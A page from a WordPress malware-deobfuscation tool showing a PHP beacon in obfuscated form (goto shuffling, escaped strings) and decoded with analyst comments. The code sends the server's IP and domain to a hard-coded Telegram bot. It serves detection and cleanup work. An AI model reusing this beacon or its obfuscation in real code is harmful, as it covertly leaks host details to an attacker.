
PHP deobfuscation, decryption, reconstruction tool

Deobfuscates PHP malware, viruses, and tampered code found on WordPress sites back into readable source code.

*Please note that not all obfuscated code can be decoded.

The code below was decoded.

<?php goto vUzBk; vUzBk: $server_ip = $_SERVER["\x53\x45\x52\126\x45\122\x5f\x41\104\x44\122"]; goto VhZv8; R9IMN: $result = curl_exec($ch); goto m3JRs; A2Lo2: $telegram_api_url = "\150\164\x74\x70\x73\x3a\57\57\141\x70\x69\56\x74\x65\154\145\147\x72\x61\x6d\x2e\x6f\x72\x67\x2f\142\x6f\x74" . $te...



Obfuscated PHP code

<?php
 // Obfuscated sample, left byte-for-byte as submitted. Two techniques are visible:
 //  1. Control-flow shuffling: the statements are stored out of order and chained
 //     with goto/label pairs. Execution starts at `goto vUzBk;` and follows
 //     vUzBk -> VhZv8 -> kJejC -> UzP1J -> ajjxq -> P1Y61 -> A2Lo2 -> z0a3L ->
 //     NyfZ9 -> Kmn79 -> hUdkJ -> TTz4s -> R9IMN -> m3JRs -> KtzM8 (end).
 //  2. String encoding: every double-quoted literal is written as a mix of hex
 //     (\x53) and octal (\126) escapes, so a plain-text search of the file on disk
 //     for the destination host or the $_SERVER keys will not match.
 // Function names (curl_init, curl_setopt, curl_exec, urlencode) and variable names
 // are NOT encoded, so they remain usable as search terms when triaging a site.
 goto vUzBk; vUzBk: $server_ip = $_SERVER["\x53\x45\x52\126\x45\122\x5f\x41\104\x44\122"]; goto VhZv8; R9IMN: $result = curl_exec($ch); goto m3JRs; A2Lo2: $telegram_api_url = "\150\164\x74\x70\x73\x3a\57\57\141\x70\x69\56\x74\x65\154\145\147\x72\x61\x6d\x2e\x6f\x72\x67\x2f\142\x6f\x74" . $telegram_bot_token . "\57\163\x65\x6e\x64\x4d\145\x73\163\x61\x67\x65"; goto z0a3L; P1Y61: $telegram_chat_id = "\x36\61\x32\67\70\64\x31\x34\61\x32"; goto A2Lo2; kJejC: $message = "\123\145\162\166\145\162\40\111\120\72\x20" . $server_ip . "\12"; goto UzP1J; TTz4s: curl_setopt($ch, CURLOPT_HEADER, false); goto R9IMN; NyfZ9: curl_setopt($ch, CURLOPT_POST, 1); goto Kmn79; hUdkJ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto TTz4s; m3JRs: curl_close($ch); goto KtzM8; z0a3L: $ch = curl_init($telegram_api_url); goto NyfZ9; ajjxq: $telegram_bot_token = "\65\x38\x37\x35\61\x38\x34\65\x36\x31\x3a\x41\101\107\x48\125\147\137\165\x74\x52\x6a\65\x51\117\x79\x73\x55\x52\137\x31\142\x42\164\x6d\x49\112\64\171\102\164\x4b\163\106\x71\x30"; goto P1Y61; Kmn79: curl_setopt($ch, CURLOPT_POSTFIELDS, "\143\x68\x61\164\137\x69\144\x3d" . $telegram_chat_id . "\x26\x74\x65\x78\x74\75" . urlencode($message)); goto hUdkJ; VhZv8: $server_domain = $_SERVER["\110\124\124\120\x5f\x48\117\123\124"]; goto kJejC; UzP1J: $message .= "\104\157\x6d\141\151\156\x3a\x20" . $server_domain; goto ajjxq; KtzM8: 
 ?>

Decoded (deobfuscated) PHP code

<?php

// Decoded form of the goto/escape-obfuscated sample: a beacon that reports the
// host it runs on. It builds a two-line text ("Server IP" and "Domain") and POSTs it
// to the Telegram Bot API sendMessage endpoint. Nothing in the visible code is
// echoed to the visitor, and the API response is not inspected.
// NOTE(review): how the file reached the site is not shown on this page; treat its
// presence as evidence of write access to the web root and investigate accordingly.

// Address of the server executing the script.
$server_ip = $_SERVER["SERVER_ADDR"];
// Host name taken from the incoming request's Host header, i.e. the site name
// under which this script was requested.
$server_domain = $_SERVER["HTTP_HOST"];
$message = "Server IP: " . $server_ip . "\n";
$message .= "Domain: " . $server_domain;
// Hard-coded bot token and chat id: these identify where the report is delivered
// and are the sample-specific indicators to search for (after decoding escapes).
// In this decoded output the two variables are never read again; the decoder has
// folded their values into the URL and POST-body literals below, whereas the
// obfuscated source concatenates the variables.
$telegram_bot_token = "5875184561:AAGHUg_utRj5QOysUR_1bBtmIJ4yBtKsFq0";
$telegram_chat_id = "6127841412";
$telegram_api_url = "https://api.telegram.org/bot5875184561:AAGHUg_utRj5QOysUR_1bBtmIJ4yBtKsFq0/sendMessage";
// Outbound HTTPS request from the PHP process to api.telegram.org. On a web server
// that has no business talking to Telegram, this egress is a useful detection point
// in proxy, firewall or DNS logs.
$ch = curl_init($telegram_api_url);
curl_setopt($ch, CURLOPT_POST, 1);
// Form-encoded body; only the message text is URL-encoded.
curl_setopt($ch, CURLOPT_POSTFIELDS, "chat_id=6127841412&text=" . urlencode($message));
// Return the response as a string instead of printing it, and omit response
// headers, so the request produces no output in the served page.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// The response is captured in $result but not used afterwards in the visible code;
// a failed request is ignored as well.
$result = curl_exec($ch);
curl_close($ch);



(C)2020 Wordpress Doctor All rights reserved.